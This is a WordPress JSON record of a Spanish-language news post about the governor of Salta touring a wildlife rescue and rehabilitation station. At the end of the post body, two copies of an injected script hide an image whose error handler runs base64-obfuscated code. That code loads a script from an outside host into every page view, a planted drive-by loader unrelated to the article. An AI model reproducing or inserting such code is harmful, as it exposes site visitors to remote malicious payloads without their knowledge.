{"id":1492,"date":"2022-09-15T12:53:11","date_gmt":"2022-09-15T15:53:11","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1492"},"modified":"2025-08-14T00:35:18","modified_gmt":"2025-08-14T03:35:18","slug":"en-la-reserva-de-fauna-autoctona-saenz-superviso-las-tareas-de-rescate-y-rehabilitacion-de-especies-silvestres","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1492","title":{"rendered":"En la Reserva de Fauna Aut\u00f3ctona, S\u00e1enz supervis\u00f3 las tareas de rescate y rehabilitaci\u00f3n de especies silvestres"},"content":{"rendered":"\n<h4 class=\"has-vivid-green-cyan-background-color has-background wp-block-heading\"><em>Es el \u00fanico centro de rescate y rehabilitaci\u00f3n de la fauna silvestre de la provincia. Actualmente brinda bienestar y recupera 55 animales en estado de vulnerabilidad para, si es posible, restituirlos a su ambiente natural. Alberga ejemplares v\u00edctimas de mascotismo, tr\u00e1fico y venta ilegal, caza furtiva y tenencia ilegal.<\/em><\/h4>\n\n\n\n<p>El gobernador&nbsp;<strong>Gustavo S\u00e1enz<\/strong>&nbsp;recorri\u00f3 la Estaci\u00f3n de Fauna Aut\u00f3ctona de la Reserva Natural Finca Las Costas, donde actualmente se realizan obras para mejorar la estad\u00eda de animales silvestres y optimizar el trabajo de rescate y rehabilitaci\u00f3n de 55 animales en estado de vulnerabilidad.<br><br>\u201cLa mayor\u00eda de nuestros animales son rescatados del mascotismo, actividad que est\u00e1 penada por ley, por lo que su comportamiento natural al haber sido vulnerado, no permite la liberaci\u00f3n porque representa un mayor riesgo para ellos mismos\u201d, explic\u00f3 la veterinaria Luciana Borrelli, jefa del programa de la Estaci\u00f3n de Fauna Aut\u00f3ctona (EFA), durante la recorrida de la que tambi\u00e9n particip\u00f3 el ministro de Ambiente y Desarrollo Sustentable Mart\u00edn de los R\u00edos.&nbsp;<br><br>\u201cEsto no es un zool\u00f3gico, sino un lugar en el que los animales reciben &nbsp;tratamientos de recuperaci\u00f3n en el menor tiempo posible para que puedan ser reinsertados en su medio, aunque &nbsp;a veces esto no es posible &nbsp;por haber sido domesticados en alg\u00fan momento de sus vidas\u201d, puntualiz\u00f3 Borrelli.<br><br>Adem\u00e1s, la profesional detall\u00f3 otro aspecto importante de la EFA: Ser un centro educativo y de pr\u00e1cticas profesionales para estudiantes de la carrera de Veterinaria a partir de un convenio celebrado con la Universidad Cat\u00f3lica de Salta.<br>En el predio de m\u00e1s de 10 hect\u00e1reas se trabaja con el rescate, rehabilitaci\u00f3n, liberaci\u00f3n y derivaci\u00f3n de animales silvestres aut\u00f3ctonos v\u00edctimas de mascotismo, tr\u00e1fico y venta ilegal, caza furtiva y tenencia ilegal; entre otras circunstancias.<br><br>Hoy est\u00e1n en recuperaci\u00f3n 55 animales silvestres entre aves, mam\u00edferos, grandes felinos, primates y toda fauna silvestre. Se cuentan 25 pumas, corzuelas, pecar\u00edes, coat\u00edes, monos ca\u00ed, osos meleros y hormigueros, quirquinchos, aves rapaces, tortugas, entre otros. Cada uno de ellos est\u00e1 monitoreado permanentemente por el equipo veterinario.<br>En la Estaci\u00f3n se ejecutan obras para refuncionalizar y mejorar las instalaciones.<br><br>As\u00ed ya se concluyeron los trabajos de construcci\u00f3n de un edificio para cuarentena, con ba\u00f1os y vestidor para el personal con una cocina para elaborar las comidas para los animales.<br><br>Se finaliz\u00f3 un dep\u00f3sito para almacenar el alimento de todos los animales y &nbsp;5 recintos nuevos de rehabilitaci\u00f3n, mientras se avanza con la modificaci\u00f3n y\/o ampliaci\u00f3n de los existentes.<br><br>&nbsp;En la zona central del predio y dispuesta de manera longitudinal, se realiz\u00f3 una caminer\u00eda central de punta a punta, limitada con barandas a ambos lados, con el objeto de restringir la circulaci\u00f3n de personas ajenas a la Estaci\u00f3n de Fauna en el caso de que se realicen visitas de alguna \u00edndole.<br><br>Estas obras est\u00e1n financiadas por la Provincia y el BID, por casi 40 millones.&nbsp;Tambi\u00e9n participaron de la recorrida el secretario de Ambiente Alejandro Aldazabal, el subsecretario de Residuos Urbanos Normando Z\u00fa\u00f1iga y t\u00e9cnicos de la Estaci\u00f3n.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/en-la-reserva-de-fauna-autoctona-saenz-superviso-las-tareas-de-rescate-y-rehabilitacion-de-especies-silvestres-84901\" target=\"_blank\" rel=\"noreferrer noopener\" title=\"Secretar\u00eda de Prensa y Comunicaci\u00f3n\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Es el \u00fanico centro de rescate y rehabilitaci\u00f3n de la fauna silvestre de la provincia. Actualmente brinda bienestar y recupera 55 animales en estado de vulnerabilidad para, si es posible, restituirlos a su ambiente natural. Alberga ejemplares v\u00edctimas de mascotismo, tr\u00e1fico y venta ilegal, caza furtiva y tenencia ilegal. El gobernador&nbsp;Gustavo S\u00e1enz&nbsp;recorri\u00f3 la Estaci\u00f3n de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1493,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[10,17],"tags":[],"class_list":{"0":"post-1492","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-colaboradores","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1492"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1492"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1492\/revisions"}],"predecessor-version":[{"id":7348,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1492\/revisions\/7348"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1493"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1492"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1492"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1492"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}